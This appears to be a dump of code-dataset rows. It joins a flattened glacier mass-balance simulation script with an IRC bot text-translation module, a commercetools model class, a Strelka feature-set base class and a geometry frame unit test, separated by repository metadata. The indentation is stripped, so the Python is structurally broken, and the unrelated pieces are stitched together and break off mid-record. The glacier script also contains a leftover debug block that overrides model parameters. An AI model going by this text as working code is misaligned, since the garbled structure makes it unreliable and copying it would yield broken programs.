# output_runoff_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_snowline_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_area_glac_annual = np.zeros((year_plus1_values.shape[0], sim_iters))
# output_volume_glac_annual = np.zeros((year_plus1_values.shape[0], sim_iters))
# output_ELA_glac_annual = np.zeros((year_values.shape[0], sim_iters))
# output_offglac_prec_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_refreeze_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_melt_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_snowpack_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_runoff_monthly = np.zeros((dates_table.shape[0], sim_iters))
if icethickness_initial.max() > 0:
if input.hindcast == 1:
glacier_gcm_prec = glacier_gcm_prec[::-1]
glacier_gcm_temp = glacier_gcm_temp[::-1]
glacier_gcm_lrgcm = glacier_gcm_lrgcm[::-1]
glacier_gcm_lrglac = glacier_gcm_lrglac[::-1]
# # get glacier number
# if glacier_rgi_table.O1Region >= 10:
# glacier_RGIId = main_glac_rgi.iloc[glac]['RGIId'][6:]
# else:
# glacier_RGIId = main_glac_rgi.iloc[glac]['RGIId'][7:]
if input.option_import_modelparams == 1:
ds_mp = xr.open_dataset(input.modelparams_fp + glacier_str + '.nc')
cn_subset = input.modelparams_colnames
modelparameters_all = (pd.DataFrame(ds_mp['mp_value'].sel(chain=0).values,
columns=ds_mp.mp.values)[cn_subset])
else:
modelparameters_all = (
pd.DataFrame(np.asarray([input.lrgcm, input.lrglac, input.precfactor, input.precgrad,
input.ddfsnow, input.ddfice, input.tempsnow, input.tempchange])
.reshape(1,-1), columns=input.modelparams_colnames))
# Set the number of iterations and determine every kth iteration to use for the ensemble
if input.option_calibration == 2 and modelparameters_all.shape[0] > 1:
sim_iters = input.sim_iters
# Select every kth iteration
mp_spacing = int((modelparameters_all.shape[0] - input.sim_burn) / sim_iters)
mp_idx_start = np.arange(input.sim_burn, input.sim_burn + mp_spacing)
np.random.shuffle(mp_idx_start)
mp_idx_start = mp_idx_start[0]
mp_idx_all = np.arange(mp_idx_start, modelparameters_all.shape[0], mp_spacing)
else:
sim_iters = 1
# Loop through model parameters
for n_iter in range(sim_iters):
if sim_iters == 1:
modelparameters = modelparameters_all.mean()
else:
mp_idx = mp_idx_all[n_iter]
modelparameters = modelparameters_all.iloc[mp_idx,:]
if debug:
print(glacier_str, ('PF: ' + str(np.round(modelparameters[2],2)) + ' ddfsnow: ' +
str(np.round(modelparameters[4],4)) + ' tbias: ' + str(np.round(modelparameters[7],2))))
print('\n\nDELETE ME! Switch back model parameters\n\n')
modelparameters[2] = 5
modelparameters[7] = -5
print('model params:', modelparameters)
# run mass balance calculation
(glac_bin_temp, glac_bin_prec, glac_bin_acc, glac_bin_refreeze, glac_bin_snowpack, glac_bin_melt,
glac_bin_frontalablation, glac_bin_massbalclim, glac_bin_massbalclim_annual, glac_bin_area_annual,
glac_bin_icethickness_annual, glac_bin_width_annual, glac_bin_surfacetype_annual,
glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline, glac_wide_snowpack,
glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual, offglac_wide_prec,
offglac_wide_refreeze, offglac_wide_melt, offglac_wide_snowpack, offglac_wide_runoff) = (
massbalance.runmassbalance(modelparameters[0:8], glacier_rgi_table, glacier_area_initial,
icethickness_initial, width_initial, elev_bins, glacier_gcm_temp,
glacier_gcm_tempstd, glacier_gcm_prec, glacier_gcm_elev,
glacier_gcm_lrgcm, glacier_gcm_lrglac, dates_table,
option_areaconstant=0, hindcast=input.hindcast,
debug=input.debug_mb, debug_refreeze=input.debug_refreeze))
if input.hindcast == 1:
glac_bin_temp = glac_bin_temp[:,::-1]
glac_bin_prec = glac_bin_prec[:,::-1]
glac_bin_acc = glac_bin_acc[:,::-1]
glac_bin_refreeze = glac_bin_refreeze[:,::-1]
glac_bin_snowpack = glac_bin_snowpack[:,::-1]
glac_bin_melt = glac_bin_melt[:,::-1]
glac_bin_frontalablation = glac_bin_frontalablation[:,::-1]
glac_bin_massbalclim = glac_bin_massbalclim[:,::-1]
glac_bin_massbalclim_annual = glac_bin_massbalclim_annual[:,::-1]
glac_bin_area_annual = glac_bin_area_annual[:,::-1]
glac_bin_icethickness_annual = glac_bin_icethickness_annual[:,::-1]
glac_bin_width_annual = glac_bin_width_annual[:,::-1]
glac_bin_surfacetype_annual = glac_bin_surfacetype_annual[:,::-1]
glac_wide_massbaltotal = glac_wide_massbaltotal[::-1]
glac_wide_runoff = glac_wide_runoff[::-1]
glac_wide_snowline = glac_wide_snowline[::-1]
glac_wide_snowpack = glac_wide_snowpack[::-1]
glac_wide_area_annual = glac_wide_area_annual[::-1]
glac_wide_volume_annual = glac_wide_volume_annual[::-1]
glac_wide_ELA_annual = glac_wide_ELA_annual[::-1]
offglac_wide_prec = offglac_wide_prec[::-1]
offglac_wide_refreeze = offglac_wide_refreeze[::-1]
offglac_wide_melt = offglac_wide_melt[::-1]
offglac_wide_snowpack = offglac_wide_snowpack[::-1]
offglac_wide_runoff = offglac_wide_runoff[::-1]
# # RECORD PARAMETERS TO DATASET
# if input.output_package == 2:
# (glac_wide_temp, glac_wide_prec, glac_wide_acc, glac_wide_refreeze, glac_wide_melt,
# glac_wide_frontalablation, glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline,
# glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual) = (
# convert_glacwide_results(elev_bins, glac_bin_temp, glac_bin_prec, glac_bin_acc,
# glac_bin_refreeze, glac_bin_snowpack, glac_bin_melt,
# glac_bin_frontalablation, glac_bin_massbalclim_annual,
# glac_bin_area_annual, glac_bin_icethickness_annual))
#
# if debug:
# # Compute glacier volume change for every time step and use this to compute mass balance
# # this will work for any indexing
# glac_wide_area = glac_wide_area_annual[:-1].repeat(12)
# # Mass change [km3 mwe]
# # mb [mwea] * (1 km / 1000 m) * area [km2]
# glac_wide_masschange = glac_wide_massbaltotal / 1000 * glac_wide_area
# # Mean annual mass balance [mwea]
# # note: used annual shape - 1 because area and volume have "n+1 years" t0 account for initial
# # and final
# mb_mwea = (glac_wide_masschange.sum() / glac_wide_area[0] * 1000 /
# (glac_wide_area_annual.shape[0]-1))
# print(' mb_model [mwea]:', mb_mwea.round(3))
#
# # Record output to xarray dataset
# output_temp_glac_monthly[:, n_iter] = glac_wide_temp
# output_prec_glac_monthly[:, n_iter] = glac_wide_prec
# output_acc_glac_monthly[:, n_iter] = glac_wide_acc
# output_refreeze_glac_monthly[:, n_iter] = glac_wide_refreeze
# output_melt_glac_monthly[:, n_iter] = glac_wide_melt
# output_frontalablation_glac_monthly[:, n_iter] = glac_wide_frontalablation
# output_massbaltotal_glac_monthly[:, n_iter] = glac_wide_massbaltotal
# output_runoff_glac_monthly[:, n_iter] = glac_wide_runoff
# output_snowline_glac_monthly[:, n_iter] = glac_wide_snowline
# output_area_glac_annual[:, n_iter] = glac_wide_area_annual
# output_volume_glac_annual[:, n_iter] = glac_wide_volume_annual
# output_ELA_glac_annual[:, n_iter] = glac_wide_ELA_annual
# output_offglac_prec_monthly[:, n_iter] = offglac_wide_prec
# output_offglac_refreeze_monthly[:, n_iter] = offglac_wide_refreeze
# output_offglac_melt_monthly[:, n_iter] = offglac_wide_melt
# output_offglac_snowpack_monthly[:, n_iter] = offglac_wide_snowpack
# output_offglac_runoff_monthly[:, n_iter] = offglac_wide_runoff
#
# if debug:
# print(' years:', glac_wide_volume_annual.shape[0]-1)
# print(' vol start/end:', np.round(glac_wide_volume_annual[0],2), '/',
# np.round(glac_wide_volume_annual[-1],2))
# print(' area start/end:', np.round(glac_wide_area_annual[0],2), '/',
# np.round(glac_wide_area_annual[-1],2))
# print(' volume:', glac_wide_volume_annual)
# # print('glac runoff max:', np.round(glac_wide_runoff.max(),0),
# # 'glac prec max:', np.round(glac_wide_prec.max(),2),
# # 'glac refr max:', np.round(glac_wide_refreeze.max(),2),
# # 'offglac ref max:', np.round(offglac_wide_refreeze.max(),2))
#
# # ===== Export Results =====
# rgi_table_ds = pd.DataFrame(np.zeros((1,glacier_rgi_table.shape[0])), columns=glacier_rgi_table.index)
# rgi_table_ds.iloc[0,:] = glacier_rgi_table.values
# output_ds_all_stats, encoding = create_xrdataset(rgi_table_ds, dates_table, record_stats=1,
# option_wateryear=input.gcm_wateryear)
# output_ds_all_stats['temp_glac_monthly'].values[0,:,:] = calc_stats_array(output_temp_glac_monthly)
# output_ds_all_stats['prec_glac_monthly'].values[0,:,:] = calc_stats_array(output_prec_glac_monthly)
# output_ds_all_stats['acc_glac_monthly'].values[0,:,:] = calc_stats_array(output_acc_glac_monthly)
# output_ds_all_stats['refreeze_glac_monthly'].values[0,:,:] = calc_stats_array(output_refreeze_glac_monthly)
# output_ds_all_stats['melt_glac_monthly'].values[0,:,:] = calc_stats_array(output_melt_glac_monthly)
# output_ds_all_stats['frontalablation_glac_monthly'].values[0,:,:] = (
# calc_stats_array(output_frontalablation_glac_monthly))
# output_ds_all_stats['massbaltotal_glac_monthly'].values[0,:,:] = (
# calc_stats_array(output_massbaltotal_glac_monthly))
# output_ds_all_stats['runoff_glac_monthly'].values[0,:,:] = calc_stats_array(output_runoff_glac_monthly)
# output_ds_all_stats['snowline_glac_monthly'].values[0,:,:] = calc_stats_array(output_snowline_glac_monthly)
# output_ds_all_stats['area_glac_annual'].values[0,:,:] = calc_stats_array(output_area_glac_annual)
# output_ds_all_stats['volume_glac_annual'].values[0,:,:] = calc_stats_array(output_volume_glac_annual)
# output_ds_all_stats['ELA_glac_annual'].values[0,:,:] = calc_stats_array(output_ELA_glac_annual)
# output_ds_all_stats['offglac_prec_monthly'].values[0,:,:] = calc_stats_array(output_offglac_prec_monthly)
# output_ds_all_stats['offglac_melt_monthly'].values[0,:,:] = calc_stats_array(output_offglac_melt_monthly)
# output_ds_all_stats['offglac_refreeze_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_refreeze_monthly))
# output_ds_all_stats['offglac_snowpack_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_snowpack_monthly))
# output_ds_all_stats['offglac_runoff_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_runoff_monthly))
#
# # Export statistics to netcdf
# if input.output_package == 2:
# output_sim_fp = input.output_sim_fp + gcm_name + '/'
# if gcm_name not in ['ERA-Interim', 'ERA5', 'COAWST']:
# output_sim_fp += rcp_scenario + '/'
# # Create filepath if it does not exist
# if os.path.exists(output_sim_fp) == False:
# os.makedirs(output_sim_fp)
# # Netcdf filename
# if gcm_name in ['ERA-Interim', 'ERA5', 'COAWST']:
# # Filename
# netcdf_fn = (glacier_str + '_' + gcm_name + '_c' + str(input.option_calibration) + '_ba' +
# str(input.option_bias_adjustment) + '_' + str(sim_iters) + 'sets' + '_' +
# str(input.gcm_startyear) + '_' + str(input.gcm_endyear) + '.nc')
# else:
# netcdf_fn = (glacier_str + '_' + gcm_name + '_' + rcp_scenario + '_c' +
# str(input.option_calibration) + '_ba' + str(input.option_bias_adjustment) + '_' +
# str(sim_iters) + 'sets' + '_' + str(input.gcm_startyear) + '_' + str(input.gcm_endyear)
# + '.nc')
# if input.option_synthetic_sim==1:
# netcdf_fn = (netcdf_fn.split('--')[0] + '_T' + str(input.synthetic_temp_adjust) + '_P' +
# str(input.synthetic_prec_factor) + '--' + netcdf_fn.split('--')[1])
# # Export netcdf
# output_ds_all_stats.to_netcdf(output_sim_fp + netcdf_fn, encoding=encoding)
#
# # Close datasets
# output_ds_all_stats.close()
#
#
# if debug_spc:
# os.remove(debug_fp + debug_rgiid_fn)
# Global variables for Spyder development
if args.option_parallels == 0:
global main_vars
main_vars = inspect.currentframe().f_locals
#%% PARALLEL PROCESSING
if __name__ == '__main__':
time_start = time.time()
parser = getparser()
args = parser.parse_args()
if args.debug == 1:
debug = True
else:
debug = False
# RGI glacier number
if args.rgi_glac_number_fn is not None:
with open(args.rgi_glac_number_fn, 'rb') as f:
glac_no = pickle.load(f)
elif input.glac_no is not None:
glac_no = input.glac_no
else:
main_glac_rgi_all = modelsetup.selectglaciersrgitable(
rgi_regionsO1=input.rgi_regionsO1, rgi_regionsO2 =input.rgi_regionsO2,
rgi_glac_number=input.rgi_glac_number)
glac_no = list(main_glac_rgi_all['rgino_str'].values)
# Regions
regions_str = 'R'
for region in sorted(set([x.split('.')[0] for x in glac_no])):
regions_str += str(region)
# Number of cores for parallel processing
if args.option_parallels != 0:
num_cores = int(np.min([len(glac_no), args.num_simultaneous_processes]))
else:
num_cores = 1
# Glacier number lists to pass for parallel processing
glac_no_lsts = split_glaciers.split_list(glac_no, n=num_cores, option_ordered=args.option_ordered)
# Read GCM names from argument parser
gcm_name = args.gcm_list_fn
if args.gcm_name is not None:
gcm_list = [args.gcm_name]
rcp_scenario = args.rcp
elif args.gcm_list_fn == input.ref_gcm_name:
gcm_list = [input.ref_gcm_name]
rcp_scenario = args.rcp
else:
with open(args.gcm_list_fn, 'r') as gcm_fn:
gcm_list = gcm_fn.read().splitlines()
rcp_scenario = os.path.basename(args.gcm_list_fn).split('_')[1]
print('Found %d gcms to process'%(len(gcm_list)))
# Loop through all GCMs
for gcm_name in gcm_list:
if args.rcp is None:
print('Processing:', gcm_name)
else:
print('Processing:', gcm_name, rcp_scenario)
# Pack variables for multiprocessing
list_packed_vars = []
for count, glac_no_lst in enumerate(glac_no_lsts):
list_packed_vars.append([count, glac_no_lst, regions_str, gcm_name])
# Parallel processing
if args.option_parallels != 0:
print('Processing in parallel with ' + str(args.num_simultaneous_processes) + ' cores...')
with multiprocessing.Pool(args.num_simultaneous_processes) as p:
p.map(main,list_packed_vars)
# If not in parallel, then only should be one loop
else:
# Loop through the chunks and export bias adjustments
for n in range(len(list_packed_vars)):
main(list_packed_vars[n])
print('Total processing time:', time.time()-time_start, 's')
#%% ===== PLOTTING AND PROCESSING FOR MODEL DEVELOPMENT =====
# Place local variables in variable explorer
if args.option_parallels == 0:
main_vars_list = list(main_vars.keys())
gcm_name = main_vars['gcm_name']
main_glac_rgi = main_vars['main_glac_rgi']
# main_glac_hyps = main_vars['main_glac_hyps']
# main_glac_icethickness = main_vars['main_glac_icethickness']
# main_glac_width = main_vars['main_glac_width']
dates_table = main_vars['dates_table']
if input.option_synthetic_sim == 1:
dates_table_synthetic = main_vars['dates_table_synthetic']
gcm_temp_tile = main_vars['gcm_temp_tile']
gcm_prec_tile = main_vars['gcm_prec_tile']
gcm_lr_tile = main_vars['gcm_lr_tile']
gcm_temp = main_vars['gcm_temp']
gcm_tempstd = main_vars['gcm_tempstd']
gcm_prec = main_vars['gcm_prec']
gcm_elev = main_vars['gcm_elev']
gcm_lr = main_vars['gcm_lr']
gcm_temp_adj = main_vars['gcm_temp_adj']
gcm_prec_adj = main_vars['gcm_prec_adj']
gcm_elev_adj = main_vars['gcm_elev_adj']
gcm_temp_lrglac = main_vars['gcm_lr']
# output_ds_all_stats = main_vars['output_ds_all_stats']
# modelparameters = main_vars['modelparameters']
glacier_rgi_table = main_vars['glacier_rgi_table']
glacier_str = main_vars['glacier_str']
glac_oggm_df = main_vars['glac_oggm_df']
glacier_gcm_temp = main_vars['glacier_gcm_temp']
glacier_gcm_tempstd = main_vars['glacier_gcm_tempstd']
glacier_gcm_prec = main_vars['glacier_gcm_prec']
glacier_gcm_elev = main_vars['glacier_gcm_elev']
glacier_gcm_lrgcm = main_vars['glacier_gcm_lrgcm']
glacier_gcm_lrglac = glacier_gcm_lrgcm
glacier_area_initial = main_vars['glacier_area_initial']
icethickness_initial = main_vars['icethickness_initial']
width_initial = main_vars['width_initial']
elev_bins = main_vars['elev_bins']
glac_bin_frontalablation = main_vars['glac_bin_frontalablation']
glac_bin_area_annual = main_vars['glac_bin_area_annual']
glac_bin_massbalclim_annual = main_vars['glac_bin_massbalclim_annual']
glac_bin_melt = main_vars['glac_bin_melt']
glac_bin_acc = main_vars['glac_bin_acc']
glac_bin_refreeze = main_vars['glac_bin_refreeze']
glac_bin_snowpack = main_vars['glac_bin_snowpack']
glac_bin_temp = main_vars['glac_bin_temp']
glac_bin_prec = main_vars['glac_bin_prec']
glac_bin_massbalclim = main_vars['glac_bin_massbalclim']
glac_wide_massbaltotal = main_vars['glac_wide_massbaltotal']
glac_wide_area_annual = main_vars['glac_wide_area_annual']
glac_wide_volume_annual = main_vars['glac_wide_volume_annual']
glac_wide_runoff = main_vars['glac_wide_runoff']
# glac_wide_prec = main_vars['glac_wide_prec']
# glac_wide_refreeze = main_vars['glac_wide_refreeze']
modelparameters_all = main_vars['modelparameters_all']
sim_iters = main_vars['sim_iters']
| 0 | 0 | 0 |
90b763967161ada45c58e7d2a7c5158c9e848ee0 | 6,276 | py | Python | sopel_modules/SpiceBot/Translate.py | deathbybandaid/Sopel-SpiceBotSERV | 816dddc88943b9194f3f0aa6558759eedd585343 | [
"EFL-2.0"
] | 2 | 2018-07-24T14:04:36.000Z | 2019-01-11T21:41:50.000Z | sopel_modules/SpiceBot/Translate.py | deathbybandaid/Sopel-SpiceBotSERV | 816dddc88943b9194f3f0aa6558759eedd585343 | [
"EFL-2.0"
] | 947 | 2018-07-24T01:50:29.000Z | 2019-04-14T22:40:57.000Z | sopel_modules/SpiceBot/Translate.py | deathbybandaid/Sopel-SpiceBotSERV | 816dddc88943b9194f3f0aa6558759eedd585343 | [
"EFL-2.0"
] | 6 | 2019-04-12T17:09:07.000Z | 2019-09-30T05:56:15.000Z | # coding=utf8
from __future__ import unicode_literals, absolute_import, division, print_function
from sopel_modules.spicemanip import spicemanip
import re
from num2words import num2words
translate = Translate()
| 32.020408 | 155 | 0.497291 | # coding=utf8
from __future__ import unicode_literals, absolute_import, division, print_function
from sopel_modules.spicemanip import spicemanip
import re
from num2words import num2words
class Translate():
def __init__(self):
self.dict = {}
def bot_translate_process(self, totranslate, translationtypes):
# just in case
if not isinstance(translationtypes, list):
translationtypes = [translationtypes]
for translationtype in translationtypes:
if translationtype == "hyphen":
totranslate = spicemanip(totranslate, 0).replace(' ', '-')
elif translationtype == "underscore":
totranslate = spicemanip(totranslate, 0).replace(' ', '_')
elif translationtype == "ermahgerd":
totranslate = self.trernslert(totranslate)
elif translationtype == "obscure":
totranslate = self.text_obscure(totranslate)
elif translationtype == "piglatin":
totranslate = self.text_piglatin(totranslate)
elif translationtype == "binaryinvert":
totranslate = self.text_binary_swap(totranslate)
elif translationtype == "onetozero":
totranslate = self.text_one_to_zero_swap(totranslate)
elif translationtype == "upper":
totranslate = spicemanip(totranslate, 0).upper()
elif translationtype == "lower":
totranslate = spicemanip(totranslate, 0).lower()
return totranslate
def text_obscure(self, words):
amountofletters = len(words)
mystring = "*" * amountofletters
return mystring
def text_piglatin(self, words):
if not isinstance(words, list):
words = [words]
rebuildarray = []
for word in words:
word = word.lower()
first = word[:1]
if first in ['a', 'e', 'i', 'o', 'u']:
new_word = word + 'ay'
else:
new_word = word[1:] + first + 'ay'
rebuildarray.append(new_word)
words = spicemanip(rebuildarray, 0)
return words
def trernslert(self, werds):
terkerns = werds.split()
er = ''
for terk in terkerns:
if terk.endswith(','):
terk = re.sub(r"[,]+", '', terk)
cermmer = 'true'
else:
cermmer = 'false'
if terk.startswith('('):
terk = re.sub(r"[(]+", '', terk)
lerftperernthersers = 'true'
else:
lerftperernthersers = 'false'
if terk.endswith(')'):
terk = re.sub(r"[)]+", '', terk)
rerghtperernthersers = 'true'
else:
rerghtperernthersers = 'false'
if terk.endswith('%'):
terk = re.sub(r"[%]+", '', terk)
percernt = 'true'
else:
percernt = 'false'
werd = self.ermergerd(terk)
if lerftperernthersers == 'true':
werd = str('(' + werd)
if percernt == 'true':
werd = str(werd + ' PERCERNT')
if rerghtperernthersers == 'true':
werd = str(werd + ')')
if cermmer == 'true':
werd = str(werd + ',')
cermmer
er = er + ' ' + werd
return er
def ermergerd(self, w):
w = w.strip().lower()
derctshernerer = {'me': 'meh', 'you': 'u', 'are': 'er', "you're": "yer", "i'm": "erm", "i've": "erv", "my": "mah", "the": "da", "omg": "ermahgerd"}
if w in derctshernerer:
return derctshernerer[w].upper()
else:
w = re.sub(r"[\.,/;:!@#$%^&*\?)(]+", '', w)
if w[0].isdigit():
w = num2words(int(w))
w = re.sub(r"tion", "shun", w)
pat = r"[aeiouy]+"
er = re.sub(pat, "er", w)
if w.startswith('y'):
er = 'y' + re.sub(pat, "er", w[1:])
if w.endswith('e') and not w.endswith('ee') and len(w) > 3:
er = re.sub(pat, "er", w[:-1])
if w.endswith('ing'):
er = re.sub(pat, "er", w[:-3]) + 'in'
er = er[0] + er[1:].replace('y', 'er')
er = er.replace('rr', 'r')
return er.upper()
def text_one_to_zero_swap(self, words):
if not words or words == []:
return "No input provided"
if not isinstance(words, list):
words = [words]
words = spicemanip(words, 0).split(" ")
outputarray = []
for word in words:
if not self.isitbinary(word):
word = self.text_binary_swap(word)
word = str(word).replace('1', '2')
word = str(word).replace('0', '1')
word = str(word).replace('2', '0')
outputarray.append(str(word))
outputarray = spicemanip(outputarray, 0)
return outputarray
def text_binary_swap(self, words):
if not words or words == []:
return "No input provided"
if not isinstance(words, list):
words = [words]
words = spicemanip(words, 0).split(" ")
outputarray = []
for word in words:
if self.isitbinary(word):
word = self.bits2string(word) or 'error'
else:
word = self.string2bits(word) or 1
word = spicemanip(word, 0)
outputarray.append(str(word))
outputarray = spicemanip(outputarray, 0)
return outputarray
def unicode_string_cleanup(string):
for r in (("\u2013", "-"), ("\u2019", "'"), ("\u2026", "...")):
string = string.replace(*r)
return string
def isitbinary(self, string):
p = set(string)
s = {'0', '1'}
if s == p or p == {'0'} or p == {'1'}:
return True
else:
return False
def string2bits(self, s=''):
return [bin(ord(x))[2:].zfill(8) for x in s]
def bits2string(self, b=None):
return ''.join(chr(int(b[i*8:i*8+8], 2)) for i in range(len(b)//8))
translate = Translate()
| 5,716 | -3 | 347 |
f12e3008a4319a15eacceb3b37eb991f2dfc9a15 | 1,108 | py | Python | models/type.py | DevgurusSupport/commercetools-python-sdk | 849c4cc182b68850fedc1f67a594449c28a4f751 | [
"MIT"
] | null | null | null | models/type.py | DevgurusSupport/commercetools-python-sdk | 849c4cc182b68850fedc1f67a594449c28a4f751 | [
"MIT"
] | null | null | null | models/type.py | DevgurusSupport/commercetools-python-sdk | 849c4cc182b68850fedc1f67a594449c28a4f751 | [
"MIT"
] | null | null | null | from .basemodel import BaseModel
from .types.field_definition import FieldDefinition
from typing import List, Dict
| 36.933333 | 178 | 0.643502 | from .basemodel import BaseModel
from .types.field_definition import FieldDefinition
from typing import List, Dict
class Type(BaseModel):
key: str
name: Dict
description: Dict
resourceTypeIds: List[str]
fieldDefinitions: List[FieldDefinition]
def __init__(self, key: str = None, name: Dict = None, description: Dict = None, resourceTypeIds: List[str] = None, fieldDefinitions: List[FieldDefinition] = None, **kwargs):
super().__init__(**kwargs)
self.key = key
self.name = name
self.description = description
self.resourceTypeIds = resourceTypeIds
if fieldDefinitions is not None:
_fieldDefinitions = []
for fieldDefinition in fieldDefinitions:
if isinstance(fieldDefinition, dict):
_fieldDefinitions.append(
FieldDefinition(**fieldDefinition))
else:
_fieldDefinitions.append(fieldDefinition)
self.fieldDefinitions = _fieldDefinitions
else:
self.fieldDefinitions = fieldDefinitions
| 816 | 153 | 23 |
7e168a33fd90d6bac2118972d179f010ae072f3f | 1,688 | py | Python | scripts/strelka-2.9.2.centos6_x86_64/share/scoringModelTraining/somatic/lib/evs/features/__init__.py | dongxuemin666/RNA-combine | 13e178aae585e16a9a8eda8151d0f34316de0475 | [
"Apache-2.0"
] | 7 | 2021-09-03T09:11:00.000Z | 2022-02-14T15:02:12.000Z | scripts/strelka-2.9.2.centos6_x86_64/share/scoringModelTraining/somatic/lib/evs/features/__init__.py | dongxuemin666/RNA-combine | 13e178aae585e16a9a8eda8151d0f34316de0475 | [
"Apache-2.0"
] | null | null | null | scripts/strelka-2.9.2.centos6_x86_64/share/scoringModelTraining/somatic/lib/evs/features/__init__.py | dongxuemin666/RNA-combine | 13e178aae585e16a9a8eda8151d0f34316de0475 | [
"Apache-2.0"
] | 2 | 2022-01-10T13:07:29.000Z | 2022-01-11T22:14:11.000Z | #
# Strelka - Small Variant Caller
# Copyright (c) 2009-2018 Illumina, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
import abc
class FeatureSet(object):
""" VCF paired Feature set for somatic comparison """
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def collect(self, vcfname):
""" Return a data frame with features collected from
the given VCF, tagged by given type """
pass
@abc.abstractmethod
def trainingfeatures(self):
""" Return a list of columns that are features to use for EVS model training """
pass
sets = {}
@staticmethod
@staticmethod
import SomaticSNV # noqa
import SomaticIndel # noqa
import PosAndAlleles # noqa
| 27.225806 | 88 | 0.673578 | #
# Strelka - Small Variant Caller
# Copyright (c) 2009-2018 Illumina, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
import abc
class FeatureSet(object):
""" VCF paired Feature set for somatic comparison """
__metaclass__ = abc.ABCMeta
def __init__(self):
pass
@abc.abstractmethod
def collect(self, vcfname):
""" Return a data frame with features collected from
the given VCF, tagged by given type """
pass
@abc.abstractmethod
def trainingfeatures(self):
""" Return a list of columns that are features to use for EVS model training """
pass
sets = {}
@staticmethod
def register(name, xclass=None):
if xclass is None:
def fn(xclass2):
FeatureSet.sets[name] = xclass2
return fn
else:
FeatureSet.sets[name] = xclass
@staticmethod
def make(name):
# noinspection PyCallingNonCallable
return FeatureSet.sets[name]()
import SomaticSNV # noqa
import SomaticIndel # noqa
import PosAndAlleles # noqa
| 282 | 0 | 79 |
c98f6322ac2340652aaaf45eb747da841ba74e6d | 2,815 | py | Python | simulation/utils/geometry/test/test_frame.py | LeonardII/KitCarFork | b2802c5b08cc8250446ce3731cb622af064db4ca | [
"MIT"
] | 13 | 2020-06-30T17:18:28.000Z | 2021-07-20T16:55:35.000Z | simulation/utils/geometry/test/test_frame.py | LeonardII/KitCarFork | b2802c5b08cc8250446ce3731cb622af064db4ca | [
"MIT"
] | 1 | 2020-11-10T20:15:42.000Z | 2020-12-25T18:27:56.000Z | simulation/utils/geometry/test/test_frame.py | LeonardII/KitCarFork | b2802c5b08cc8250446ce3731cb622af064db4ca | [
"MIT"
] | 3 | 2020-07-20T09:09:08.000Z | 2021-07-20T17:00:37.000Z | import math
import unittest
from simulation.utils.geometry.frame import Frame, validate_and_maintain_frames
from simulation.utils.geometry.transform import Transform
from simulation.utils.geometry.vector import Vector
if __name__ == "__main__":
unittest.main()
| 31.988636 | 83 | 0.630906 | import math
import unittest
from simulation.utils.geometry.frame import Frame, validate_and_maintain_frames
from simulation.utils.geometry.transform import Transform
from simulation.utils.geometry.vector import Vector
class ModuleTest(unittest.TestCase):
def test_connecting_frames(self):
"""Test if frames can be connected."""
frame_1 = Frame("frame_1")
frame_2 = Frame("frame_2")
frame_3 = Frame("frame_3")
frame_1.connect_to(
frame_2, transformation_to_frame=Transform([0, 0], math.radians(90))
)
frame_2.connect_to(
frame_3, transformation_to_frame=Transform([0, 0], math.radians(-90))
)
frame_1.connect_to(
frame_3, transformation_to_frame=Transform([0, 0], math.radians(-90))
)
def test_transformations(self):
"""Test if frame transformations work as expected.
Note: This is only tested for vectors because the behavior must be the same
for all classes that are transformable.
"""
frame_1 = Frame("frame_1")
frame_2 = Frame("frame_2")
frame_1.connect_to(
frame_2, transformation_to_frame=Transform([0, 0], math.radians(90))
)
vec_frame_1 = Vector(1, 0, 0, frame=frame_1)
vec_frame_2 = frame_2(vec_frame_1)
self.assertEqual(vec_frame_2, Vector(0, 1, 0, frame=frame_2))
vec_frame_2 = frame_2(vec_frame_2)
self.assertEqual(vec_frame_2, Vector(0, 1, 0, frame=frame_2))
def test_frame_decorator(self):
"""Test if frames are correctly checked and propagated by decorator."""
frame_1 = Frame("frame_1")
frame_2 = Frame("frame_2")
class Framed:
def __init__(self, frame):
self._frame = frame
@validate_and_maintain_frames
def test_func(*args, **kwargs):
return kwargs["result"]
# Test case 1:
# Two objects, same frame
args = (Framed(frame_1), Framed(frame_1))
result = test_func(*args, result=Framed(None))
self.assertEqual(result._frame, frame_1)
# Test case 2:
# Two objects, only one has a frame
# Result should still have a frame
args = (Framed(frame_1), Framed(None))
result = test_func(*args, result=Framed(None))
self.assertEqual(result._frame, frame_1)
args = (Framed(None), Framed(frame_2))
result = test_func(*args, result=Framed(None))
self.assertEqual(result._frame, frame_2)
# Test case 3:
# Objects have different frames
args = (Framed(frame_1), Framed(frame_2))
with self.assertRaises(ValueError):
result = test_func(*args, result=Framed(None))
if __name__ == "__main__":
unittest.main()
| 87 | 2,436 | 23 |
bdeac31fc404c7ca4aa58750eff8f810ef925d2f | 990 | py | Python | tests/window/WINDOW_SET_ICON.py | theblacklion/pyglet | 5fd5c7d581e376946b7a94fac9582c09ad65bcd2 | [
"BSD-3-Clause"
